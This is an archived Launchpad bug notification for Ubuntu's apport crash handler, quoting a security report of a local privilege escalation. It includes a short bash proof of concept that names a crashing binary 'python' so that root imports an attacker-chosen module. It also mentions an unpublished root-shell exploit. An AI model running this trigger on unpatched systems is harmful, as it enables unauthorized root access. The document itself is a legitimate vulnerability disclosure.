touch-packages team mailing list archive

Thread
Date
[Bug 1507480] Re: Privilege escalation through Python module imports

To: touch-packages@xxxxxxxxxxxxxxxxxxx
From: Launchpad Bug Tracker <1507480@xxxxxxxxxxxxxxxxxx>
Date: Tue, 27 Oct 2015 13:14:09 -0000
Reply-to: Bug 1507480 <1507480@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx
** Branch linked: lp:~ubuntu-core-dev/ubuntu/vivid/apport/ubuntu

** Branch linked: lp:~ubuntu-core-dev/ubuntu/precise/apport/ubuntu

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1507480

Title:
  Privilege escalation through Python module imports

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  In Progress
Status in apport source package in Precise:
  Fix Released
Status in apport source package in Trusty:
  Fix Released
Status in apport source package in Vivid:
  Fix Released
Status in apport source package in Wily:
  Fix Released
Status in apport source package in Xenial:
  In Progress

Bug description:
  Gabriel Campana <gabriel@xxxxxxxxxxxxxxxxx> reported a security
  vulnerability in Apport:

  ummary
  =======

  A privilege escalation was discovered in apport.

  
  Details
  =======

  The command line of the process triggering the coredump is checked to
  determine if it's a script. If the interpreter is Python and the first
  argument is ``-m``, the method ``_python_module_path`` is called to find
  the path of the culprit module
  (``/usr/lib/python3/dist-packages/apport/report.py``)::

      @classmethod
      def _python_module_path(klass, module):
          '''Determine path of given Python module'''

          module = module.replace('/', '.')

          try:
              m = __import__(module)
              m
          except:
              return None

          [...]

  Any Python module in ``sys.path`` can be imported because the variable
  ``module`` is under control of the attacker. It should be noted that
  ``_python_module_path`` is called with euid=0, and apport relies on the
  process name to determine if the process is an interpreter. A crash of
  Python isn't required to reach this function: any process name starting
  with ``python`` and producing a core dump is enough. As an example, the
  following bash script triggers the bug::

         #!/bin/bash

          cat <<EOF > python.c
          int main(void) { *(int *)0 = 0; return 0; }
          EOF
          gcc -o python python.c
          ./python -m venv.__main__

  and results in the creation of a "lightweight virtual Python
  environment" in the root directory::

          $ ./lol.sh
          ./lol.sh: line 8:  7665 Segmentation fault      (core dumped)
          $ ls -l / | head -4
          total 100
          drw-rw----   5 root root  4096 Sep 29 16:09 7665
          drwxr-xr-x   2 root root  4096 Sep 29 05:41 bin
          drwxr-xr-x   3 root root  4096 Sep 29 06:20 boot

  
  Criticity
  =========

  Importing an arbitrary module is a security issue because a few standard
  modules rely on files in the home directory associated to the uid of the
  dumped process. A fully working exploit has been written (targetting
  Python2 and Python3), giving an instant root shell to the attacker.
  While the exploitation is straightforward for Python2, a bit more work
  was required to find a suitable module for Python3.

  The vulnerability seems to be limited to Ubuntu Dekstop because apport
  is disabled on Ubuntu Server.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1507480/+subscriptions